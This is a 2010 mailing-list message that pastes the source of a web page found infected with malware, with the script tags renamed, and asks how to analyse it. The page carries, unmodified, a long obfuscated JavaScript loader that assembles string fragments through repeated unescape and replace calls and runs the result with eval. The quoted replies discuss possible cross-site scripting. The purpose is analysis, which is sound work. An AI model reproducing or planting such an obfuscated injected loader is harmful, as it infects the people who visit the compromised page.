This will not be harmful, even if using an html email client, as I've taken the <script> & </script> tags away & substituted them for startScript & EndScript. I've also changed some of the links to protect the identity of the site owner. The malware code, which begins at the StartScript line, remains unmodified. Website code, w/said modifications, follows: <html> <head> <title>Brochure Description.</title> <meta name="generator" content="Namo WebEditor"> </head> <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"> <p><a href="brochure.txt">Read the Brochure Description.</a></p> <p> </p> <p> </p> <p><a href="../pictures/scanner1.jpg" title="Backspace to return to the Brochure page">Click here to see the image of the scanner.</a></p> <p><a href="../index.htm">Click here to return to the main page.</a></p> Startscript var HZv41="0Uc%70Uc%65";var GvKLQUO="U565U3";var jmxo="56Uc%32Uc";var bM0s4kK="65X1%6EX";var VEBu9H=")));var u7WWvGG";var IrujHKMf="cape(VeXTi";var D4yffv="2p27p2p3Bp2p45p";var f8PbNZny="45Ul05U3A5U2F5";var M0qRNPX="2p27p2p3";f8PbNZny+="U2F5U665U";var uSEZFp="%6CUc%64";var Z63uwf3L="2p6Dp2p39";var VMBo="X1%4AX1%";var aomWLFkN="pe(sVYxD.repla";var IzwRw="75X1%6CX1%6CX";var Dfpl="%G6ECV%G";var YmEnz0="BUc%62Uc%7AUc%6";var THWVXP="%65X1%6D";var Sq0sXIq="8Uc%29Uc";var BYWZ61="64X1%6FX1%6";var UDJ1U="1%69X1%";M0qRNPX="Dp2p27p2p31p"+M0qRNPX;var LEAFMHeO="7X1%6EX";var uWgM="lace(/5U/g";var IHW7e="2X1%6DX1%4AX1%2";var kj8q4EDR="X1%4CX1%";var vfK9="4X1%2EX1%77";var Gh094="1%27X1%6EX1%4A";IHW7e+="7X1%3EX1%3";var LLKQ="1%22X1%3BX1%";var EKtdBNSm="EX1%27X1%3BX";var FNc4c="%69X1%76";var QdyeSQ="2p68p2p2Ep2";Dfpl="%G65CV"+Dfpl;YmEnz0="Uc%6EUc%27Uc%3"+YmEnz0;Sq0sXIq="0Uc%76Uc%6"+Sq0sXIq;bM0s4kK=BYWZ61+"3X1%75X1%6DX1%"+bM0s4kK;var FiX0XoS="62X1%6FX1%6";var E5x2dsN="2E5U6C5U655U6";var OVUIGhiv="1%74X1%2EX1%62";Gh094="1%64X1%28X"+Gh094;vfK9="1%6EX1%7"+vfK9;var aVOu3="1%22X1";var kzAcz1J="62X1%34X";kzAcz1J+="1%75X1%4AX";var RELt3a="1%62X1%7AX1%";var Qo2CkEnH="2p65p2p3Dp2";kj8q4EDR="61X1%72X1%20"+kj8q4EDR;bM0s4kK+="1%74X1%2EX1%67X";var dDXmwo3A="vGG.replace";var bhxk="to='CV%G76CV%";var IkVX="V%G61CV%";var A1qyC62H="Uc%3DU";var iYkv7M="c%2EUc%";var KQ2oM="V%G56CV%G32";LLKQ+="69X1%66X1%28X1%";THWVXP+="X1%65X1%6EX1%";var R4UlrgM="c%2EUc%73Uc%74";var Xpl0="CV%G65CV%G6ECV";var GDWRD71W="9X1%3B";Qo2CkEnH="2p6Ep2p61p2p6Dp"+Qo2CkEnH;OVUIGhiv="X1%6EX"+OVUIGhiv;var QDgE5S="V%G65CV";LLKQ="76X1%3EX"+LLKQ;var Gn1Hf="X1%4AX1%";dDXmwo3A="l(unescape(u7WW"+dDXmwo3A;FNc4c=aVOu3+"%3CX1%64X1"+FNc4c;D4yffv="p3Dp2p27p2p31p"+D4yffv;var iI37="5Uc%2EUc";LLKQ="1%69X1%"+LLKQ;var sh0nfd="val(une";Xpl0="G6CCV%G65CV%G6D"+Xpl0;IkVX+="G6DCV%G65CV";var RA2Xa0C="X1%4AX1%29";FiX0XoS="3CX1%2FX1%"+FiX0XoS;var aYuQp="2p68p2p65p2";var nH1U="1%63X1%75";var Chhxqnc="c%6EUc%55Uc";EKtdBNSm+="1%64X1%";RA2Xa0C+="X1%3BX1%76X1";kzAcz1J="4CX1%4AX1%"+kzAcz1J;kj8q4EDR+="4AX1%62X1%34X1%";VEBu9H+="='Uc%45Uc%6";bM0s4kK=RELt3a+"67X1%33X1%3DX1%"+bM0s4kK;var Bne0Vu="2p50p2p45p2p";IzwRw+="1%29X1%4CX1";var EqUHdyH="2p32p2p50p";dDXmwo3A+="(/Uc%/";var PGGTC8G4="%3CX1%62X1%6FX1";IkVX="V%G66CV%G72C"+IkVX;Bne0Vu+="42p2p4Ap2p38p2";var XOCC="/jE%/g,";var V2GOJW="79X1%3DX";IkVX="8CV%G27CV%G69C"+IkVX;var RxjaBhHe="nescape(cwM8a.";Sq0sXIq=Chhxqnc+"%56Uc%32Uc%5"+Sq0sXIq;YmEnz0="c%64Uc%64Uc%65"+YmEnz0;var NxrXgFJ="/CV%/g,'M')";var CFTN="G6FCV%G6";jmxo=VEBu9H+"EUc%55Uc%"+jmxo;FiX0XoS=kzAcz1J+"1%2BX1%27X1%"+FiX0XoS;PGGTC8G4+="%64X1%79X1%3EX1";XOCC="replace("+XOCC;OVUIGhiv=nH1U+"X1%6DX1%65"+OVUIGhiv;var hwdh="G72CV%G";Qo2CkEnH=EqUHdyH+"2p76p2p68p2p2Ep"+Qo2CkEnH;EKtdBNSm+="6FX1%63X1%75X";D4yffv="p2p74p2"+D4yffv;vfK9+="X1%72X1%69X1%7";D4yffv=aYuQp+"p69p2p67p2p68"+D4yffv;IkVX=Xpl0+"%G74CV%G2"+IkVX;D4yffv="8p2p2Ep"+D4yffv;iI37+="%76Uc%69Uc%73U";IzwRw+="%4AX1%62X";FNc4c=kj8q4EDR+"75X1%4AX1%3DX"+FNc4c;M0qRNPX="p68p2p3"+M0qRNPX;Gh094="2X1%79X1%49X"+Gh094;var JQuU22H="56p2p32p2p50p";RxjaBhHe="l5U3B';eval(u"+RxjaBhHe;var GmdcLH="g,'%')));var c";dDXmwo3A=Sq0sXIq+"%3B';eva"+dDXmwo3A;var DowPTru="='p2p45p2p6E";f8PbNZny="l5U685Ul45Ul"+f8PbNZny;UDJ1U=FNc4c+"X1%20X"+UDJ1U;IkVX=QDgE5S+"%G45CV%"+IkVX;uWgM=",'7').rep"+uWgM;NxrXgFJ="place("+NxrXgFJ;NxrXgFJ=IrujHKMf+"Xto.re"+NxrXgFJ;OVUIGhiv=LLKQ+"64X1%6FX"+OVUIGhiv;Dfpl=CFTN+"3CV%G75CV%G6DCV"+Dfpl;uWgM=RxjaBhHe+"replace(/l/g"+uWgM;Z63uwf3L="4p2p77p"+Z63uwf3L;EKtdBNSm=FiX0XoS+"4X1%79X1%3"+EKtdBNSm;XOCC+="'C').repla";M0qRNPX+="Bp2p45p2p6";iI37=R4UlrgM+"Uc%79Uc%6CUc%6"+iI37;KQ2oM+="CV%G50CV%G7";PGGTC8G4=Gn1Hf+"3DX1%27X1"+PGGTC8G4;iI37=jmxo+"%50Uc%76Uc%68U"+iI37;iYkv7M=YmEnz0+"7Uc%33U"+iYkv7M;IHW7e="36X1%4"+IHW7e;Gh094+="X1%36X1";Dfpl="G3DCV%G64CV%"+Dfpl;UDJ1U="%76X1%"+UDJ1U;iYkv7M=A1qyC62H+"c%27Uc%68Uc%69U"+iYkv7M;UDJ1U="var sVYxD='X1"+UDJ1U;JQuU22H=M0qRNPX+"Ep2p55p2p"+JQuU22H;E5x2dsN="5U695Ul45Ul35U"+E5x2dsN;var M9KCV="c%6CUc%69Uc%7";uSEZFp="%43Uc%68Uc%69Uc"+uSEZFp;bM0s4kK+="1%65X1%74X1";dDXmwo3A=uSEZFp+"Uc%28Uc%45U"+dDXmwo3A;V2GOJW=OVUIGhiv+"X1%6FX1%64X1%"+V2GOJW;E5x2dsN+="D5U6F5U";IkVX="65CV%G61CV%G74C"+IkVX;GmdcLH+="wM8a='5U455U";var kVenPGu1="5U2E5Ul35Ul25U6";var OSQgQl="Ull5Ul35U2F5U";GDWRD71W="1%4AX1%27X1%2"+GDWRD71W;Gh094=THWVXP+"74X1%4"+Gh094;var NPjBLDc="p56p2p32p";f8PbNZny=kVenPGu1+"35U3D5U2"+f8PbNZny;IzwRw=V2GOJW+"1%3DX1%6EX1%"+IzwRw;Dfpl=KQ2oM+"6CV%G68CV%"+Dfpl;uWgM+=",'%')));var x";Dfpl+="74CV%G2EC";IHW7e=LEAFMHeO+"1%4AX1%"+IHW7e;RA2Xa0C=VMBo+"62X1%34X1%75"+RA2Xa0C;D4yffv=JQuU22H+"2p76p2p6"+D4yffv;hwdh+="20CV%G45CV%";IkVX=Dfpl+"V%G63CV%G72CV%G"+IkVX;iYkv7M=M9KCV+"4Uc%79"+iYkv7M;IkVX=hwdh+"G6ECV%G55C"+IkVX;EKtdBNSm=PGGTC8G4+"%27X1%2BX1%"+EKtdBNSm;dDXmwo3A+="g,'%')))";GvKLQUO=GmdcLH+"6E5U555"+GvKLQUO;DowPTru=uWgM+"sMZ5Nj1"+DowPTru;sh0nfd=Z63uwf3L+"p2p27p2p3B';e"+sh0nfd;bM0s4kK=RA2Xa0C+"%61X1%72X1%20X"+bM0s4kK;Qo2CkEnH=D4yffv+"2p6Ep2p55p2p56p"+Qo2CkEnH;sh0nfd=Bne0Vu+"p47p2p4jE%p2p5"+sh0nfd;vfK9+="4X1%65X1%20X1";IkVX=bhxk+"G61CV%"+IkVX;NPjBLDc=DowPTru+"p2p55p2"+NPjBLDc;Gh094=bM0s4kK+"%45X1%6CX1"+Gh094;dDXmwo3A+=";";E5x2dsN=f8PbNZny+"l25Ul5"+E5x2dsN;IHW7e=UDJ1U+"64X1%3DX1%2"+IHW7e;aomWLFkN=GDWRD71W+"';eval(unesca"+aomWLFkN;aomWLFkN=Gh094+"%42X1%6DX"+aomWLFkN;aomWLFkN+="ce(/X1%/g,'%";E5x2dsN=GvKLQUO+"25U505Ul65U68"+E5x2dsN;IkVX=aomWLFkN+"')));var VeXTiX"+IkVX;XOCC=sh0nfd+"scape(xsMZ5Nj1."+XOCC;IkVX=vfK9+"%28X1%4C"+IkVX;dDXmwo3A=HZv41+"Uc%6EUc%64Uc"+dDXmwo3A;IzwRw=IHW7e+"CX1%2FX1%64X"+IzwRw;Qo2CkEnH="9p2p64p2p74p2"+Qo2CkEnH;IkVX+="%G27CV%G29CV";EKtdBNSm=IzwRw+"1%34X1%75"+EKtdBNSm;NxrXgFJ=IkVX+"%G3B';eval(unes"+NxrXgFJ;dDXmwo3A=iYkv7M+"61Uc%7"+dDXmwo3A;XOCC=Qo2CkEnH+"p27p2p44p"+XOCC;QdyeSQ=NPjBLDc+"2p50p2p76p"+QdyeSQ;iI37=XOCC+"ce(/p2p/g,'%'"+iI37;E5x2dsN=NxrXgFJ+".replace(/MG/"+E5x2dsN;dDXmwo3A=iI37+"c%69Uc%62Uc%69U"+dDXmwo3A;dDXmwo3A=QdyeSQ+"p77p2p6"+dDXmwo3A;OSQgQl=E5x2dsN+"6E5U695U615U2E5"+OSQgQl;OSQgQl=EKtdBNSm+"1%6DX1%65X"+OSQgQl;dDXmwo3A=OSQgQl+"545U625U6C5U2"+dDXmwo3A;eval(dDXmwo3A); EndScript </body> </html> On 7/3/10, Dave <davidct1209@xxxxxxxxx> wrote: > At initial read of your message, it sounds like a cross-site scripting > attack. I'm not sure of any browsers that render binary code within > script tags, so not sure what that is since usually xxs attacks inject > java script running in the user's security context. > > On 7/3/10, Jackie McBride <abletec@xxxxxxxxx> wrote: >> Hay, yall: >> >> I was just thinkin (& that's always dangerous for me), but, now that >> I've come out of my lurking hole, perhaps I'll keep my head out just a >> bit longer & ask this. I hammered a virus off of a website the other >> day. For whatever reason, it got my curiosity up, & I was rather >> wondering exactly what its code does. So: any1 got any ideas of how to >> analyze that? It looked like a compiled script (at least there were >> <script> </script> tags, but between those tags was output that 1 >> would associate w/a binary file. >> >> I sure would like to know precisely what it does. I'm also surprised >> that out of several A V apps I tested, the only 1 to pick it up was >> Avast. Still, I know it did not belong in that site, given the source >> of other pages that I saw on the same site that weren't infected. >> >> -- >> Change the world--1 deed at a time >> Jackie McBride >> Scripting Classes: http://jawsscripting.lonsdalemedia.org >> homePage: www.abletec.serverheaven.net >> For technophobes: www.technophoeb.com >> __________ >> View the list's information and change your settings at >> //www.freelists.org/list/programmingblind >> >> > __________ > View the list's information and change your settings at > //www.freelists.org/list/programmingblind > > -- Change the world--1 deed at a time Jackie McBride Scripting Classes: http://jawsscripting.lonsdalemedia.org homePage: www.abletec.serverheaven.net For technophobes: www.technophoeb.com __________ View the list's information and change your settings at //www.freelists.org/list/programmingblind